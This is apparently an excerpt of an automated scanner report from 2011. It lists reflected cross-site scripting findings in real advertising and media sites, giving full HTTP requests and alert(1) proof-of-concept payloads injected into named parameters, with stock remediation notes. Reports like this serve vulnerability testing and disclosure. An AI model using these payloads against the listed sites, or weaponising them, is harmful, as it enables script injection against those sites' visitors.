GET /rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9;sz=728x90;click0=http://c.casalemedia.com/c/2/1/88646/;ord=34856309556da0d"-alert(1)-"9d189a7cf3d HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://3ps.go.com/DynamicAd?srvc=abc&adTypes=Banner-Remnant&url=/primetime/charlies-angels/bios/eve-french
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=85A39D4B6E9886329A268FD24420D20D; Path=/
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:07:58 GMT
Connection: close
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 64628<script>alert(1)</script>adbac286e48 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /services/get?callback=GUMGUM.startServices64628<script>alert(1)</script>adbac286e48&_=1316238826949&pubdata={%22t%22:%22tmzdtcom%22,%22v%22:1,%22r%22:%229926v3%22,%22rf%22:%22%22} HTTP/1.1
Host: g2.gumgum.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the redir request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a19be'%3balert(1)//63b277fa96a was submitted in the redir parameter. This input was echoed as a19be';alert(1)//63b277fa96a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 36dcc<script>alert(1)</script>39a607c6ef6 was submitted in the mbox parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the clicktracking request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c993b"-alert(1)-"79e3f04e7ed was submitted in the clicktracking parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
4.118. http://imp.fetchback.com/serve/fb/adtag.js [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://imp.fetchback.com
Path: /serve/fb/adtag.js
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5581f"-alert(1)-"11bcd5d0490 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the type request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 95638"-alert(1)-"4bc29a81874 was submitted in the type parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
4.120. http://jcp.org/en/jsr/all [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://jcp.org
Path: /en/jsr/all
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 284c1"><script>alert(1)</script>451b1e39851 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en/jsr/all?284c1"><script>alert(1)</script>451b1e39851=1 HTTP/1.1
Host: jcp.org
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://jcp.org/aboutJava/communityprocess/maintenance/jsr234/index2.html
The value of the ali request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ea4cb'%3balert(1)//4b86e2820c was submitted in the ali parameter. This input was echoed as ea4cb';alert(1)//4b86e2820c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the cid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fe30b'%3balert(1)//803e9c23130 was submitted in the cid parameter. This input was echoed as fe30b';alert(1)//803e9c23130 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the clen request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 31fab'%3balert(1)//0fad37552c8 was submitted in the clen parameter. This input was echoed as 31fab';alert(1)//0fad37552c8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload 7ec98<script>alert(1)</script>b1efe77bc87 was submitted in the csid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the p request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 91982'%3balert(1)//e1948788f29 was submitted in the p parameter. This input was echoed as 91982';alert(1)//e1948788f29 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the pid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5b443'%3balert(1)//a35e45272ee was submitted in the pid parameter. This input was echoed as 5b443';alert(1)//a35e45272ee in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the pli request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 61d4e'%3balert(1)//bb7df706fb4 was submitted in the pli parameter. This input was echoed as 61d4e';alert(1)//bb7df706fb4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the ref request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ce66b'%3balert(1)//a655a638949 was submitted in the ref parameter. This input was echoed as ce66b';alert(1)//a655a638949 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the sid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fbb14'%3balert(1)//5c7df914983 was submitted in the sid parameter. This input was echoed as fbb14';alert(1)//5c7df914983 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the ver request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 31763'%3balert(1)//9a116341702 was submitted in the ver parameter. This input was echoed as 31763';alert(1)//9a116341702 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the vid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 69e1a'%3balert(1)//d8a16318306 was submitted in the vid parameter. This input was echoed as 69e1a';alert(1)//d8a16318306 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the get request parameter is copied into the HTML document as plain text between tags. The payload 276c3<script>alert(1)</script>2f89cc1f134 was submitted in the get parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 10 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 35aa8"><script>alert(1)</script>e320abbb45e was submitted in the REST URL parameter 10. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d379f"><script>alert(1)</script>cdd4cac9c4c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 10 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7095e"><script>alert(1)</script>372b13aff79 was submitted in the REST URL parameter 10. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2129"><script>alert(1)</script>3d7659e830d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c158e"><script>alert(1)</script>74eb6653c9a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6438"><script>alert(1)</script>21e8c03b3a3 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f12c6"><script>alert(1)</script>11ed6697784 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 6767c<script>alert(1)</script>579e3c6c8aa was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /63857/8b52baa86e5b07ac085974feb13e2090?callback=BF_PARTNER.gate_response6767c<script>alert(1)</script>579e3c6c8aa&cb=8827 HTTP/1.1
Host: pglb.buzzfed.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload cffa8<script>alert(1)</script>3083eeb5b42 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /63857/bb0a99aabad3110617eff2ef79bb3c27?callback=BF_PARTNER.gate_responsecffa8<script>alert(1)</script>3083eeb5b42&cb=6085 HTTP/1.1
Host: pglb.buzzfed.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload e276d<script>alert(1)</script>39fac306275 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /63857/d9dfb925d83ec9decb12af7e255ebee7?callback=BF_PARTNER.gate_responsee276d<script>alert(1)</script>39fac306275&cb=984 HTTP/1.1
Host: pglb.buzzfed.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the anId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d8f9e"-alert(1)-"4993f914f2 was submitted in the anId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /jspix?anId=144d8f9e"-alert(1)-"4993f914f2&pubId=454&campId=179530 HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000007248707&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=57558110&rk1=25841281&rk2=1316239702.554&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=A85C4E9B1CE6AFEC2478698F24E6FB3D; Path=/
Content-Type: text/javascript
Date: Sat, 17 Sep 2011 01:48:34 GMT
Connection: close
The value of the campId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a8394"-alert(1)-"5aa455f48a3 was submitted in the campId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /jspix?anId=144&pubId=454&campId=179530a8394"-alert(1)-"5aa455f48a3 HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000007248707&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=57558110&rk1=25841281&rk2=1316239702.554&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=B1CD64CE4ACF13A13714A33EC4F9E56D; Path=/
Content-Type: text/javascript
Date: Sat, 17 Sep 2011 01:48:37 GMT
Connection: close
4.145. http://pixel.adsafeprotected.com/jspix [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://pixel.adsafeprotected.com
Path: /jspix
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload af364"-alert(1)-"9591c354c26 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /jspix?anId=144&pubId=454&campId=179530&af364"-alert(1)-"9591c354c26=1 HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000007248707&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=57558110&rk1=25841281&rk2=1316239702.554&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=D8F12D5393B81356B131F4FF06E12958; Path=/
Content-Type: text/javascript
Date: Sat, 17 Sep 2011 01:48:37 GMT
Connection: close
The value of the pubId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1a0dd"-alert(1)-"c19b890ed0c was submitted in the pubId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /jspix?anId=144&pubId=4541a0dd"-alert(1)-"c19b890ed0c&campId=179530 HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000007248707&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=57558110&rk1=25841281&rk2=1316239702.554&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=FA4ADE180D50AB2EABEDD27FA7E62877; Path=/
Content-Type: text/javascript
Date: Sat, 17 Sep 2011 01:48:36 GMT
Connection: close
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 775ff<a>a5eff5e8762 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The value of REST URL parameter 1 is copied into an HTML comment. The payload 650a7--><script>alert(1)</script>b7520712271 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
The value of REST URL parameter 1 is copied into an HTML comment. The payload b628c--><script>alert(1)</script>5426b9bf004 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 37608<a>6a6ab97d218 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The value of REST URL parameter 2 is copied into an HTML comment. The payload b2040--><script>alert(1)</script>de55340569 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
The value of the limit request parameter is copied into the HTML document as plain text between tags. The payload 975e8<script>alert(1)</script>8e1784da2c was submitted in the limit parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /v1/public/yql/uhTrending/cokeTrending2?format=json&callback=YAHOO_one_uh.popularSearches&_maxage=1800&diagnostics=false&limit=1975e8<script>alert(1)</script>8e1784da2c HTTP/1.1
Host: query.yahooapis.com
Proxy-Connection: keep-alive
Referer: http://omg.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
YAHOO_one_uh.popularSearches({"error":{"lang":"en-US","description":"Invalid value for variable 'limit' expecting an integer got '1975e8<script>alert(1)</script>8e1784da2c'"}});
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload c817e<script>alert(1)</script>328a2b755f1 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /gsd/1316238723013.0?callback=INFOLINKS.gsdCallbackc817e<script>alert(1)</script>328a2b755f1&pid=159065&wsid=1&pdom=www.toofab.com&purl=http%3A%2F%2Fwww.toofab.com%2F&jsv=222.0.4 HTTP/1.1 Host: router.infolinks.com Proxy-Connection: keep-alive Referer: http://www.toofab.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: max-age=0
Content-Type: text/javascript;charset=UTF-8
Content-Length: 263
Date: Sat, 17 Sep 2011 00:50:40 GMT
Connection: close
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 6a0db<script>alert(1)</script>537547a0793 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload f71aa<script>alert(1)</script>a749c541a4 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 6d7c0<script>alert(1)</script>807ea01e6bb was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload ff2bd<script>alert(1)</script>2eed346dbcf was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload c225d<script>alert(1)</script>c979af99300 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload ef5a2<script>alert(1)</script>62d6a50225d was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload fe53e<script>alert(1)</script>cbd73a72ca0 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the rid request parameter is copied into the HTML document as plain text between tags. The payload 73873<script>alert(1)</script>96519b5c9d9 was submitted in the rid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the lid request parameter is copied into the HTML document as plain text between tags. The payload 67fef<script>alert(1)</script>6a7e468dd77 was submitted in the lid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the rid request parameter is copied into the HTML document as plain text between tags. The payload b1512<script>alert(1)</script>2de489fe3894dc8d1 was submitted in the rid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method; however, it was possible to convert the request to use the GET method, which makes the attack easier to demonstrate and deliver.
Request
GET /action/doq.htm?pcode=utf-8&r=1316238789823.1&purl=http%3A%2F%2Fwww%2Etoofab%2Ecom%2Fnews%2F&makey=47425c40415c4340415c4342445d434143444040424a40464147405d69737677&ref=www%2Etoofab%2Ecom%2F2011%2F09%2F16%2Fexclusive%2Dmelissa%2Drivers%2Dsplits%2Dwith%2Dboyfriend%2F&ptitle=hollywood%20news%2Cred%20carpet%20fashion%20and%20celebrity%20hairstyles%20%7C%20toofab%2Ccom&pid=159065&wsid=1&by=f&ptxt=latest%7Cnews%7Cmost%7Cread%7C%C2%A9%202011%20ehm%20productions%7Cinc%7Call%20rights%20reserved%7Creproduction%20in%20whole%20or%20in%20part%20without%20permission%20is%20prohibited%7Cin%20partnership%20with%20tmz%7Ccom%7C&jsv=222%2E0%2E4&page%5Fkeyw=hollywood%20news%2Cred%20carpet%20fashion%2Ccelebrity%20hairstyles%2Ccelebrity%20beauty%20buzz%2Ccelebrity%20gossip%2Cacademy%20awards%2Coscars%2Ccelebrity%20makeup%2Ccelebrity%20bikini%20bodies%2Ccelebrity%20style%2Ccelebrity%20dresses%2Ccelebrity%20jewelry%2Ccelebrity%20handbags&crtw=0&twnum=28&crtss=30&pdesc=get%20the%20latest%20celebrity%20gossip%2Chollywood%20news%2Ccovering%20red%20carpet%20fashion%20and%20events%2Ccelebrity%20hairstyles%20and%20celebrity%20beauty%20buzz%20at%20toofab%21&crt=0&pimgs=toofab%7Clove%20it%7Clive%20it%7Cthis%20week%27s%20hottest%20pics%7Cbabies%7Cboobs%20%26%20beyonce%21%7Ctoddlers%20%26%20tiaras%7Cstar%20goes%20wild%20on%20live%20tv%7Cexclusive%7Cmelissa%20rivers%20splits%20with%20boyfriend%7Ctaylor%20lautner%20shows%20stubble%20at%7Cabduction%7Cpremiere%7Csnooki%20slams%20into%20italian%20cop%7Cwatch%20the%20accident%21%7Cjill%20zarin%7Cno%20pink%20slip%20for%7Creal%20housewives%7Cvictoria%20beckham%20%26%20baby%20harper%27s%20shopping%20spree%7Cbritney%20spears%20wears%20ring%20amid%20engagement%20rumors%7Ccelebs%20love%20camilla%20and%20marc%7Cjanuary%20jones%20gives%20birth%20to%20baby%20boy%7Cmark%20ballas%20and%20pia%20tosano%20split%7Creport%7Cthree%20ny%7Chousewives%7Cget%20the%20boot%7Chewitt%20holds%20hands%20with%20rumored%20bf%7Cwho%20is%20he%7Cnew%20york%20fashion%20week%20finale%7Cfall%20tv%20calendar%7Ca%20guide%20to%20new%20%26%20returning%20shows%7Cchmerkovskiy%20brothers%20face%2Doff%20for%20the%20first%20time%21%7Cworst%20dressed%20stars%20of%20emmys%7Cpast%7Ctoday%27s%20celebrity%20birthdays%7Csarah%20jessica%20parker%27s%20many%20premiere%20looks%7Cjane%20lynch%7Cwhat%20should%20she%20wear%20at%20the%20emmys%7Chot%20shots%7Cseptember%2016%7C2011%7Cgeorge%20clooney%27s%20many%20former%20flames%7Cemmy%20awards%7Cred%20carpet%20regulars%20through%20the%20years%7Cbest%20dressed%20stars%20of%20emmys%7Cpast%7C2011%20emmy%20awards%7Cwho%20should%20win%7Creport%7Cthree%20ny%7Chousewives%7Cget%20the%20boot%7Cnew%7Ctwo%20and%20a%20half%20men%7Copener%7Cashton%7Csings%7Ctheme%21%7Cexclusive%7Cmelissa%20rivers%20splits%20with%20boyfriend%7Cjustin%20bieber%27s%20surprising%20views%20on%20marriage%7Csnooki%20gets%20inked%7Csee%20her%20new%20tattoo%7Ctoofab&rts=1316238789824&cs